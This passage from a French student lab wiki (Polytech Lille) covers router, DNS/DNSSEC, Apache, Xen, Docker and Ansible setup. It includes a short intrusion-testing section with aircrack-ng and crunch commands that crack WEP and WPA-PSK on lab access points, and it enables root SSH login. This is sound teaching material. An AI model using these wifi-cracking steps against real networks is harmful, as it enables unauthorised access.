  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52020</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52020"/>
				<updated>2020-01-05T15:28:01Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du commutateur 1 (COM-1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
